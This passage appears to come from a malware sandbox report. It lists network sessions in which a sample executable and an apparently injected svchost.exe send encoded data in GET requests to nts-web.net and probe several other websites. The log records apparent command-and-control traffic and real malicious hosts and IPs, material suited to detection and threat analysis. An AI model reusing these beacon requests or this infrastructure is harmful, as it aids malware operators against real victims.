                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: nts-web.net
                                                                                                                                                                                                                                                                        Content-Length: 5076
                                                                                                                                                                                                                                                                        2023-03-10 06:56:22 UTC1589OUTData Raw: 7a 4a 55 35 71 70 4f 63 6f 4b 53 6e 71 71 79 76 73 72 57 34 75 37 37 42 78 63 68 6c 51 77 2f 6a 35 33 33 70 4d 6b 58 58 74 5a 4a 62 47 6f 6c 36 69 38 35 37 62 35 31 6a 67 4e 6e 6e 4d 47 49 70 50 2f 42 52 42 4f 73 57 30 75 4b 51 4b 30 4e 5a 32 68 77 58 59 78 6b 76 2f 30 4f 74 4c 4e 48 35 4c 4a 64 43 65 32 71 69 54 4c 30 33 4d 4e 37 49 6a 71 51 4f 47 79 57 38 75 31 58 44 6f 63 4c 74 41 45 44 75 41 4b 73 57 6c 4c 34 32 66 6b 7a 4c 4e 5a 69 66 66 79 30 72 39 53 5a 4d 59 78 77 50 46 49 30 34 6e 69 43 4f 72 43 64 64 6f 44 65 4f 50 6f 78 4e 44 51 74 5a 30 47 2f 57 2f 48 43 6c 4b 74 2f 59 70 6e 6a 6a 64 59 74 61 61 61 59 52 34 68 41 4d 4c 6f 70 70 69 35 48 56 63 74 35 36 51 69 58 48 6c 57 6a 6c 58 61 6e 42 51 37 7a 6e 76 6c 65 63 4d 63 6b 63 6d 79 44 63 74 63 62
                                                                                                                                                                                                                                                                        Data Ascii: zJU5qpOcoKSnqqyvsrW4u77BxchlQw/j533pMkXXtZJbGol6i857b51jgNnnMGIpP/BRBOsW0uKQK0NZ2hwXYxkv/0OtLNH5LJdCe2qiTL03MN7IjqQOGyW8u1XDocLtAEDuAKsWlL42fkzLNZiffy0r9SZMYxwPFI04niCOrCddoDeOPoxNDQtZ0G/W/HClKt/YpnjjdYtaaaYR4hAMLoppi5HVct56QiXHlWjlXanBQ7znvlecMckcmyDctcb


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        102192.168.2.65825749.212.235.175443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:22 UTC1594OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: nts-web.net
                                                                                                                                                                                                                                                                        Content-Length: 4272
                                                                                                                                                                                                                                                                        2023-03-10 06:56:22 UTC1594OUTData Raw: 75 6d 55 66 34 45 52 4e 55 31 68 65 59 57 56 70 62 48 42 30 64 33 74 2f 67 6f 56 4f 68 50 50 39 78 7a 52 73 72 59 43 67 58 37 6d 33 35 41 2b 39 4e 79 66 38 39 52 4f 57 70 66 41 31 69 6e 4a 2b 49 41 4a 33 55 56 38 46 71 69 34 31 63 58 66 75 77 7a 30 38 42 52 63 48 62 67 6e 43 51 58 31 76 39 31 73 70 46 6b 75 59 50 39 4e 56 6c 78 58 55 32 56 6e 49 39 50 66 70 74 2f 43 65 56 6f 48 38 6f 56 66 50 70 63 30 33 68 41 66 4c 4e 50 68 52 53 67 56 31 4a 6b 4b 32 41 79 44 68 6f 66 2f 49 39 5a 66 59 4b 46 64 73 66 77 36 46 31 74 55 45 53 6c 31 48 4e 43 4d 66 44 64 37 62 66 2f 73 67 53 6c 55 6c 45 50 41 35 78 44 37 78 6f 4b 69 4f 2f 52 43 58 5a 2b 74 6b 59 4f 43 45 32 52 4d 30 55 4d 44 30 78 36 59 55 39 6d 2b 64 6c 41 38 6d 7a 50 33 72 63 52 4c 32 72 63 70 61 4b 4a 66
                                                                                                                                                                                                                                                                        Data Ascii: umUf4ERNU1heYWVpbHB0d3t/goVOhPP9xzRsrYCgX7m35A+9Nyf89ROWpfA1inJ+IAJ3UV8Fqi41cXfuwz08BRcHbgnCQX1v91spFkuYP9NVlxXU2VnI9Pfpt/CeVoH8oVfPpc03hAfLNPhRSgV1JkK2AyDhof/I9ZfYKFdsfw6F1tUESl1HNCMfDd7bf/sgSlUlEPA5xD7xoKiO/RCXZ+tkYOCE2RM0UMD0x6YU9m+dlA8mzP3rcRL2rcpaKJf


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        103192.168.2.658986172.67.156.49443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:23 UTC1647OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: orlyhotel.com
                                                                                                                                                                                                                                                                        Cookie: django_language=en
                                                                                                                                                                                                                                                                        2023-03-10 06:56:23 UTC1647INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:23 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Cache-Control: max-age=0, no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Expires: Fri, 10 Mar 2023 06:46:27 GMT
                                                                                                                                                                                                                                                                        Content-Language: en
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 10 Mar 2023 06:46:27 GMT
                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                        Vary: Accept-Language
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=L9m1JHdkg9zmNSvC3MD56R0THilW9senDrG1EDrBpIpyZUnNpkx0A93DoqCrJl2zVObSW1aH31aFZPyOkZNvz1ZIO3kPfmfrB%2FikGAXz7zXWMZjXgnvlYdlYAfGQdRRf"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 7a59a8505b173604-FRA
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                        2023-03-10 06:56:23 UTC1648INData Raw: 31 62 0d 0a 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 20 28 35 30 30 29 3c 2f 68 31 3e 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 1b<h1>Server Error (500)</h1>
                                                                                                                                                                                                                                                                        2023-03-10 06:56:23 UTC1648INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        104192.168.2.65879049.212.235.175443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:24 UTC1648OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: nts-web.net
                                                                                                                                                                                                                                                                        Content-Length: 3856
                                                                                                                                                                                                                                                                        2023-03-10 06:56:24 UTC1648OUTData Raw: 69 57 73 2f 68 5a 79 6d 71 61 75 74 73 4c 4b 30 74 37 6d 38 78 4d 6a 4c 7a 74 47 36 79 32 44 65 5a 76 65 52 4c 6a 79 7a 44 42 72 2b 66 56 6d 71 31 74 6d 63 30 64 6f 62 53 4c 57 34 55 73 5a 4d 63 71 37 52 5a 2f 61 47 69 76 70 79 66 78 64 67 32 74 74 5a 52 49 56 32 42 38 4f 6c 7a 79 59 61 31 34 48 4f 79 61 49 59 41 75 67 4e 78 77 68 2f 4c 34 4f 4c 45 73 30 53 56 7a 37 34 62 34 43 2f 6f 48 4c 71 79 48 66 68 6c 32 53 78 57 7a 4e 4a 53 31 73 57 43 46 4b 39 44 32 37 69 45 44 52 48 73 75 67 66 35 4f 7a 7a 50 50 70 59 64 48 58 37 78 45 2b 4b 44 50 6c 72 32 78 75 64 77 6d 66 6d 52 37 34 6a 77 66 56 71 58 45 33 43 6e 6c 76 69 30 6f 50 42 4d 69 4e 49 66 2f 63 79 37 4d 51 54 52 5a 55 39 45 77 44 63 44 71 46 4c 46 44 42 6b 59 51 64 2f 70 65 52 33 46 64 77 68 2f 6c 62
                                                                                                                                                                                                                                                                        Data Ascii: iWs/hZymqautsLK0t7m8xMjLztG6y2DeZveRLjyzDBr+fVmq1tmc0dobSLW4UsZMcq7RZ/aGivpyfxdg2ttZRIV2B8OlzyYa14HOyaIYAugNxwh/L4OLEs0SVz74b4C/oHLqyHfhl2SxWzNJS1sWCFK9D27iEDRHsugf5OzzPPpYdHX7xE+KDPlr2xudwmfmR74jwfVqXE3Cnlvi0oPBMiNIf/cy7MQTRZU9EwDcDqFLFDBkYQd/peR3Fdwh/lb


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        105192.168.2.659457104.21.48.207443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:24 UTC1652OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: orlyhotel.com
                                                                                                                                                                                                                                                                        Cookie: django_language=en
                                                                                                                                                                                                                                                                        2023-03-10 06:56:24 UTC1652INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:24 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Cache-Control: max-age=0, no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Expires: Fri, 10 Mar 2023 06:46:28 GMT
                                                                                                                                                                                                                                                                        Content-Language: en
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 10 Mar 2023 06:46:28 GMT
                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                        Vary: Accept-Language
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EGymfG%2BkQNyYbV5dg8v8VQW5nPJQ2KUf0k7jeZjvrDmJekKzGNzM0HQ2n2ln7Yj9GQCBC7KZqg22IZyNKexLELQKwUGiGdJaRTiT2xct40haTMHV7vewHFTwwIw%2BuFWY"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 7a59a85759435bf5-FRA
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                        2023-03-10 06:56:24 UTC1653INData Raw: 31 62 0d 0a 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 20 28 35 30 30 29 3c 2f 68 31 3e 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 1b<h1>Server Error (500)</h1>
                                                                                                                                                                                                                                                                        2023-03-10 06:56:24 UTC1653INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        106192.168.2.65980783.223.113.46443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:24 UTC1653OUTGET /wp-signup.php?new=magicomm.co.uk HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: dataform.co.uk


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        107192.168.2.65978249.212.235.175443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:25 UTC1653OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: nts-web.net
                                                                                                                                                                                                                                                                        Content-Length: 5372
                                                                                                                                                                                                                                                                        2023-03-10 06:56:25 UTC1653OUTData Raw: 70 59 43 48 36 61 32 31 75 4c 71 38 76 73 48 44 78 63 6a 4b 7a 4d 2f 52 30 39 57 52 32 6f 4b 4c 36 4e 57 2f 46 36 6a 2f 50 38 76 49 6d 4c 43 32 76 61 6c 5a 5a 74 57 43 6b 4a 30 71 75 48 4e 66 50 58 69 77 77 54 65 2f 77 62 6f 38 47 46 68 55 41 6d 43 51 33 4d 43 61 69 42 6a 78 65 7a 52 4c 5a 53 63 59 38 47 57 6d 7a 41 5a 32 4c 4b 75 45 51 30 75 4c 44 35 2f 71 76 4d 64 56 6a 77 37 54 62 34 37 70 4c 70 6e 6c 57 31 75 37 4d 74 78 42 69 53 62 34 4a 55 68 41 5a 59 72 6f 6d 6e 65 54 35 77 33 51 69 78 76 4b 43 4a 37 4e 79 50 32 73 5a 6b 47 33 70 6c 32 79 46 30 38 75 43 66 72 4c 4c 63 6c 7a 54 63 44 77 77 31 69 32 74 5a 59 4c 31 4e 43 4d 45 4c 41 61 71 4d 6f 6d 74 56 65 34 47 73 50 48 6b 63 43 50 4d 4b 62 4a 73 66 4f 34 35 76 44 33 64 38 67 51 4c 79 36 33 61 4a 61
                                                                                                                                                                                                                                                                        Data Ascii: pYCH6a21uLq8vsHDxcjKzM/R09WR2oKL6NW/F6j/P8vImLC2valZZtWCkJ0quHNfPXiwwTe/wbo8GFhUAmCQ3MCaiBjxezRLZScY8GWmzAZ2LKuEQ0uLD5/qvMdVjw7Tb47pLpnlW1u7MtxBiSb4JUhAZYromneT5w3QixvKCJ7NyP2sZkG3pl2yF08uCfrLLclzTcDww1i2tZYL1NCMELAaqMomtVe4GsPHkcCPMKbJsfO45vD3d8gQLy63aJa


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        108192.168.2.660599138.201.65.187443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:25 UTC1658OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: diamir.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:25 UTC1658INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:25 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 162
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Location: https://www.diamir.de/
                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                        2023-03-10 06:56:25 UTC1659INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        109192.168.2.660919138.201.65.187443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:25 UTC1659OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: www.diamir.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:25 UTC1659INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:25 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 548
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                        2023-03-10 06:56:25 UTC1659INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20
                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        11192.168.2.652650188.114.96.3443C:\Users\user\Desktop\iJzpyjAehB.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC149OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: hyab.se
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC160INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:14 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Location: https://hyab.com
                                                                                                                                                                                                                                                                        Cache-Control: max-age=600
                                                                                                                                                                                                                                                                        Expires: Fri, 10 Mar 2023 07:06:14 GMT
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yXgslH5jaHN5inlQavW1DDJ%2FGyxnFN4oGzDml7JdMJC6BI9Wdwf9RfYI4IxuARuz9cNFpT%2F77STuN4ICFL6MYVWCv%2FJ9670CJ9IgUapUBKzerrz2bliuu1NM"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 7a59a8178dd235df-FRA
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC161INData Raw: 63 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 79 61 62 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: c8<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://hyab.com">here</a>.</p></body></html>
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC161INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        110192.168.2.661059188.114.96.3443C:\Users\user\Desktop\iJzpyjAehB.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:25 UTC1660OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: sigtoa.com
                                                                                                                                                                                                                                                                        2023-03-10 06:56:25 UTC1660INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:25 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                                                                                                        Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7jaPyjwLjpx7mFuLUb16%2Bs1OcRqz45TnLT8x9Thtw5ApsCJwlUk1cjfH5p%2FLc4oZ0kCjQC85guarrRVvz43cKI9z8AmHj3m6JQJfn5iRTmv5wxqyARc2PYW7LPag"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 7a59a85f4a71928f-FRA
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                        2023-03-10 06:56:25 UTC1661INData Raw: 31 65 61 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78
                                                                                                                                                                                                                                                                        Data Ascii: 1ea7<!DOCTYPE html><html lang="en-US"><head> <title>Just a moment...</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=Edge"> <meta name="robots" content="noindex
